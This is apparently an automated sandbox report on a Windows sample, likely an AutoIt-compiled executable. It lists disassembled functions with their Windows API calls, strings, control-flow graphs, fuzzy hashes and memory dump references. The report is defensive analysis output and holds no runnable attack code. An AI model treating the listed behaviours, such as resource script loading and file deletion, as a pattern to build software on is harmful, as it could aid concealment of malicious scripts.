                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00324AE7
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00324AF2
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00324B23
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00324B2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986165174-0
                                                                                                                    • Opcode ID: fc9f58d08072eb3e529db3c12d684c9eace3cd3fa55ca452dd2d016cd600e70c
                                                                                                                    • Instruction ID: 7bc7105d8eb931f8529c4c313f06e905fc96b611a0602160f6e07ddd0c7fae2e
                                                                                                                    • Opcode Fuzzy Hash: fc9f58d08072eb3e529db3c12d684c9eace3cd3fa55ca452dd2d016cd600e70c
                                                                                                                    • Instruction Fuzzy Hash: FC91C3319897D0DEC733CB7894505AAFFF9AF2A301B4449ADD0CB93A11D260E50CC759
                                                                                                                    Function 00324E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1104 324e89-324ea1 CreateStreamOnHGlobal 1105 324ea3-324eba FindResourceExW 1104->1105 1106 324ec1-324ec6 1104->1106 1107 324ec0 1105->1107 1108 35d933-35d942 LoadResource 1105->1108 1107->1106 1108->1107 1109 35d948-35d956 SizeofResource 1108->1109 1109->1107 1110 35d95c-35d967 LockResource 1109->1110 1110->1107 1111 35d96d-35d98b 1110->1111 1111->1107
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00324D8E,?,?,00000000,00000000), ref: 00324E99
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00324D8E,?,?,00000000,00000000), ref: 00324EB0
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F), ref: 0035D937
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F), ref: 0035D94C
                                                                                                                    • LockResource.KERNEL32(00324D8E,?,?,00324D8E,?,?,00000000,00000000,?,?,?,?,?,?,00324E2F,00000000), ref: 0035D95F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: 30e2cd8ea71c24643cac9e03a7827c0bcb1a07ed8ff964b1037213bac1742b15
                                                                                                                    • Instruction ID: 9fbe562ef5969c9363234b0e8415295e7782c457dbcb14cd7eee86dc55f3077f
                                                                                                                    • Opcode Fuzzy Hash: 30e2cd8ea71c24643cac9e03a7827c0bcb1a07ed8ff964b1037213bac1742b15
                                                                                                                    • Instruction Fuzzy Hash: 9C112E75240711BFE7228BA5EC48F677BBEFBC6B51F118668F40596650DB61EC008A60
                                                                                                                    Function 0032FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: pb>$%;
                                                                                                                    • API String ID: 3964851224-2616112080
                                                                                                                    • Opcode ID: bee9d3c1709789d2909ac16a2d066c70ca7bc85d211b9fdbc724224a910c9fe4
                                                                                                                    • Instruction ID: 6bd9799e6682cf1356f6036d8d8987ba3d4d5b7b170260022c730db7769c8126
                                                                                                                    • Opcode Fuzzy Hash: bee9d3c1709789d2909ac16a2d066c70ca7bc85d211b9fdbc724224a910c9fe4
                                                                                                                    • Instruction Fuzzy Hash: 3B929A74A08341CFD72ADF24C490B2AB7E5BF85304F15896DE88A8B362D775EC45CB92
                                                                                                                    Function 0032E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Dd>$Dd>$Dd>$Dd>$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 0-1081683785
                                                                                                                    • Opcode ID: 102b4fc75a25bbc71ecc4b11a442b1cb4ed22b7f9d89ea93aa69e5bb6a357239
                                                                                                                    • Instruction ID: d2c8f46ab2eb2d435ab7db61285b7bd42512bbff307571a594795ae8e8e73827
                                                                                                                    • Opcode Fuzzy Hash: 102b4fc75a25bbc71ecc4b11a442b1cb4ed22b7f9d89ea93aa69e5bb6a357239
                                                                                                                    • Instruction Fuzzy Hash: DCA2CE74A00225CFCB26CF58E482AAEB7B5FF59310F258469E805AF351D734ED82CB90
                                                                                                                    Function 0038445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0035E398), ref: 0038446A
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0038447B
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038448B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48322524-0
                                                                                                                    • Opcode ID: a6be019c2c003aeb99768307444bc055370a47f2617c9ae57caf99325a96c127
                                                                                                                    • Instruction ID: 7765e54e85ef31d4eb9d2699e109ea4300832d9304efe3531093cb5872d2b859
                                                                                                                    • Opcode Fuzzy Hash: a6be019c2c003aeb99768307444bc055370a47f2617c9ae57caf99325a96c127
                                                                                                                    • Instruction Fuzzy Hash: 62E0D8364146016B82117B78EC0D5E97B9C9F06335F100B55F835C24E0E7B49D009695
                                                                                                                    Function 003309D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00330A5B
                                                                                                                    • timeGetTime.WINMM ref: 00330D16
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00330E53
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00330E61
                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00330EFA
                                                                                                                    • DestroyWindow.USER32 ref: 00330F06
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00330F20
                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00364E83
                                                                                                                    • TranslateMessage.USER32(?), ref: 00365C60
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00365C6E
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00365C82
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb>$pb>$pb>$pb>
                                                                                                                    • API String ID: 4212290369-2037319231
                                                                                                                    • Opcode ID: fd9b41bd3ebbc31dcbc1c2399a33ba954afce8ffd7f5fa8c8bc223c3222d4775
                                                                                                                    • Instruction ID: 02b529737f2da7c924dc93a2dbb333dde6f38051c9dc2c798af0a6d79e4cd426
                                                                                                                    • Opcode Fuzzy Hash: fd9b41bd3ebbc31dcbc1c2399a33ba954afce8ffd7f5fa8c8bc223c3222d4775
                                                                                                                    • Instruction Fuzzy Hash: D2B2E570608741DFD72BDF24C895BAAB7E4BF85304F14892DF5999B2A1CB71E884CB42
                                                                                                                    Function 00389155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00388F5F: __time64.LIBCMT ref: 00388F69
                                                                                                                      • Part of subcall function 00324EE5: _fseek.LIBCMT ref: 00324EFD
                                                                                                                    • __wsplitpath.LIBCMT ref: 00389234
                                                                                                                      • Part of subcall function 003440FB: __wsplitpath_helper.LIBCMT ref: 0034413B
                                                                                                                    • _wcscpy.LIBCMT ref: 00389247
                                                                                                                    • _wcscat.LIBCMT ref: 0038925A
                                                                                                                    • __wsplitpath.LIBCMT ref: 0038927F
                                                                                                                    • _wcscat.LIBCMT ref: 00389295
                                                                                                                    • _wcscat.LIBCMT ref: 003892A8
                                                                                                                      • Part of subcall function 00388FA5: _memmove.LIBCMT ref: 00388FDE
                                                                                                                      • Part of subcall function 00388FA5: _memmove.LIBCMT ref: 00388FED
                                                                                                                    • _wcscmp.LIBCMT ref: 003891EF
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389824
                                                                                                                      • Part of subcall function 00389734: _wcscmp.LIBCMT ref: 00389837
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00389452
                                                                                                                    • _wcsncpy.LIBCMT ref: 003894C5
                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 003894FB
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00389511
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00389522
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00389534
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1500180987-0
                                                                                                                    • Opcode ID: b0fd50a4bf397a00b506b591cbdac6decf52a4093e1672d3fe89d691ca11474e
                                                                                                                    • Instruction ID: 379f62d44b7b169c84bb9366448cf1fa3268bdefed494ab2dec8d13b71750856
                                                                                                                    • Opcode Fuzzy Hash: b0fd50a4bf397a00b506b591cbdac6decf52a4093e1672d3fe89d691ca11474e
                                                                                                                    • Instruction Fuzzy Hash: 4BC130B1D00219AADF12EF95CC85EEEB7BDEF45310F0044A6F609EB151EB709A448F65
                                                                                                                    Function 00323015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00323074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0032309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 003230CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 003230F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: e01a0db347d66f049bb4ad8e0c5dfa3a77af8f5de1813d8007e927519948bb85
                                                                                                                    • Instruction ID: e2874d23d07aa1797a5e96d6d0adc3f857dcb90c3743f53a4e621a9f4a7ddee6
                                                                                                                    • Opcode Fuzzy Hash: e01a0db347d66f049bb4ad8e0c5dfa3a77af8f5de1813d8007e927519948bb85
                                                                                                                    • Instruction Fuzzy Hash: B2313AB1941349DFDB12CFE4E8846C9BBF8FB09314F14466AE580EA2A0D3B54585CF51
                                                                                                                    Function 00323041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00323074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0032309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 003230CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 003230F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: a03765513f8aa38dd146ed6abc7684c71b8317e32994160016e20bdf5e33bba5
                                                                                                                    • Instruction ID: 10b2455c30022424c813d718dc183cf64656412d9da64009c54445a9b6277f72
                                                                                                                    • Opcode Fuzzy Hash: a03765513f8aa38dd146ed6abc7684c71b8317e32994160016e20bdf5e33bba5
                                                                                                                    • Instruction Fuzzy Hash: E021C5B5901358AFDB12DFE4E889BDDBBF8FB09704F00422AF610AA2A0D7B145448F95
                                                                                                                    Function 0032708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003E52F8,?,003237AE,?), ref: 00324724
                                                                                                                      • Part of subcall function 0034050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00327165), ref: 0034052D
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003271A8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0035E8C8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0035E909
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0035E947
                                                                                                                    • _wcscat.LIBCMT ref: 0035E9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                    • Opcode ID: 1e7a8b5f30af951486c231b39bab57fe5c4114c3ff1c2633dbec28556815fca6
                                                                                                                    • Instruction ID: 622b720250678264ccafe4a892071c25383d2a80f63e217742d298b2e997302f
                                                                                                                    • Opcode Fuzzy Hash: 1e7a8b5f30af951486c231b39bab57fe5c4114c3ff1c2633dbec28556815fca6
                                                                                                                    • Instruction Fuzzy Hash: 7871AD715083519EC316EF65E88299BBBECFF55350F400A2EF5458B2B0DB319948CB92
                                                                                                                    Function 00323633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 760 323633-323681 762 323683-323686 760->762 763 3236e1-3236e3 760->763 765 3236e7 762->765 766 323688-32368f 762->766 763->762 764 3236e5 763->764 767 3236ca-3236d2 DefWindowProcW 764->767 768 35d0cc-35d0fa call 331070 call 331093 765->768 769 3236ed-3236f0 765->769 770 323695-32369a 766->770 771 32374b-323753 PostQuitMessage 766->771 773 3236d8-3236de 767->773 803 35d0ff-35d106 768->803 774 3236f2-3236f3 769->774 775 323715-32373c SetTimer RegisterWindowMessageW 769->775 777 35d154-35d168 call 382527 770->777 778 3236a0-3236a2 770->778 772 323711-323713 771->772 772->773 779 35d06f-35d072 774->779 780 3236f9-32370c KillTimer call 32443a call 323114 774->780 775->772 782 32373e-323749 CreatePopupMenu 775->782 777->772 796 35d16e 777->796 783 323755-32375f call 3244a0 778->783 784 3236a8-3236ad 778->784 788 35d074-35d076 779->788 789 35d0a8-35d0c7 MoveWindow 779->789 780->772 782->772 797 323764 783->797 792 3236b3-3236b8 784->792 793 35d139-35d140 784->793 798 35d097-35d0a3 SetFocus 788->798 799 35d078-35d07b 788->799 789->772 794 35d124-35d134 call 382d36 792->794 795 3236be-3236c4 792->795 793->767 801 35d146-35d14f call 377c36 793->801 794->772 795->767 795->803 796->767 797->772 798->772 799->795 804 35d081-35d092 call 331070 799->804 801->767 803->767 808 35d10c-35d11f call 32443a call 32434a 803->808 804->772 808->767
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 003236D2
                                                                                                                    • KillTimer.USER32(?,00000001), ref: 003236FC
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0032371F
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0032372A
                                                                                                                    • CreatePopupMenu.USER32 ref: 0032373E
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0032374D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated$%;
                                                                                                                    • API String ID: 129472671-4181185554
                                                                                                                    • Opcode ID: 223b1cb7929293e234969c5ceb04f614f1cce62598967fb8358a73609aefd506
                                                                                                                    • Instruction ID: 65a9837fc6a0e6f03ac266737bfedbca5386948b587b9764698d722252564c62
                                                                                                                    • Opcode Fuzzy Hash: 223b1cb7929293e234969c5ceb04f614f1cce62598967fb8358a73609aefd506
                                                                                                                    • Instruction Fuzzy Hash: FE4136B2200565BBDF376F68FC89B79375CEB05340F100625FA029A2F1DB6A9E059761
                                                                                                                    Function 00323A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00323A50
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00323A5F
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00323A76
                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00323A88
                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00323A9A
                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00323AC0
                                                                                                                    • RegisterClassExW.USER32(?), ref: 00323B16
                                                                                                                      • Part of subcall function 00323041: GetSysColorBrush.USER32(0000000F), ref: 00323074
                                                                                                                      • Part of subcall function 00323041: RegisterClassExW.USER32(00000030), ref: 0032309E
                                                                                                                      • Part of subcall function 00323041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003230AF
                                                                                                                      • Part of subcall function 00323041: InitCommonControlsEx.COMCTL32(?), ref: 003230CC
                                                                                                                      • Part of subcall function 00323041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003230DC
                                                                                                                      • Part of subcall function 00323041: LoadIconW.USER32(000000A9), ref: 003230F2
                                                                                                                      • Part of subcall function 00323041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00323101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
